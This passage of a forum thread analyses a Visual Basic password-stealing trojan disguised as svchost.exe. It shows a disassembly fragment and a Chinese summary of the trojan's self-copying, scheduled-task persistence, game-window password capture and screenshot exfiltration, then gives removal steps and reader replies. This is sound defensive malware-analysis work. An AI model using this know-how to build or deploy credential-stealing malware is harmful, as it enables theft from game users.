00411B73 . 83C4 10 add esp,10
00411B76 . 50 push eax
00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
00411B7D . 50 push eax
00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
00411B84 . 83C4 1C add esp,1C
00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411B93 . 53 push ebx
00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411B9C . 50 push eax
00411B9D . 51 push ecx
00411B9E . FFD7 call edi
00411BA0 . 83C4 10 add esp,10
00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
00411BAB . 52 push edx
00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
00411BB2 . 50 push eax
00411BB3 . E8 E8030000 call svchost.00411FA0
00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411BC7 . 53 push ebx
00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
00411BCD . 53 push ebx
00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
00411BD3 . 53 push ebx
00411BD4 . 68 805C4000 push svchost.00405C80 ; All
00411BD9 . 53 push ebx
00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
总结:
1.获取制定目录创建目录,自复制,然后运行。

2.创建bat实现计划任务指定时间运行木马。

3.结束自身。

4.复制后的程序通过查找窗口,枚举进程方法获取游戏窗口截取密码。

5.至于密保就是利用截屏,然后发送到制定地址。

由于本人能力的有限,错误及遗漏在所难免! 或许原理并没有这么简单,还请其他高手作出指点. 万分感谢! 


查杀方法:

首先用XueTr.exe 结束svchost.exe结束进程(不结束怎么删除哈),然后

到这个目录删除C:\WINDOWS\system32\Pusmint下所有的文件。

然后运行XueTr.exe切换到启动项就明朗了,直接delete  *.JOB的项目。

免费评分

参与人数 5吾爱币 +3 热心值 +5 收起 理由
szm + 1 + 1 我很赞同!
aa6438315 + 2 + 1 已答复!
妖男丶帅 + 1 谢谢分享!
蓝色芒果 + 1 我很赞同!
LBD + 1 已经处理,感谢您对[吾爱破解论坛]的支持!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2010-3-14 03:36
这个代码格式怎么这么丑....
黑客猪猪 发表于 2010-3-9 11:50
gorden 发表于 2010-3-8 23:48
hxy100 发表于 2010-5-4 03:58
天才,分析好深奥
smallyou93 发表于 2010-3-15 19:46
我靠,居然是vb。。。
wanshaoling520 发表于 2010-3-13 19:28
老大 直接告诉我们 看哪个地址能确定有没木马 可以的不? 我是菜鸟 如果不行就算了
ji8123 发表于 2011-2-28 11:04
天啊  看不懂 真厉害
alasnow 发表于 2011-3-28 00:26
是如此之长的
雨牧 发表于 2011-7-21 08:33
真的看不懂。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:32

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表